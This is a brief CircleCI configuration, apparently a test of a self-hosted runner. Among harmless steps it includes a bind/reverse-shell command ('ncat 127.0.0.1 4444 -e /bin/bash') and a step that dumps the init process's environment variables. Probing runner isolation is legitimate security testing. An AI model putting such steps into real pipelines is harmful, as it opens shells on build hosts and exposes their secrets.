version: 2.1

jobs:
    runner:
         machine: true
         resource_class: failwhales/test
         steps:
            - run: echo "foo bar"
            - run: touch /tmp/foo
            - run: whoami
            - run: ncat 127.0.0.1 4444 -e /bin/bash
            - run: cat /proc/1/environ

workflows:
  build_and_test:
    jobs:
      - runner
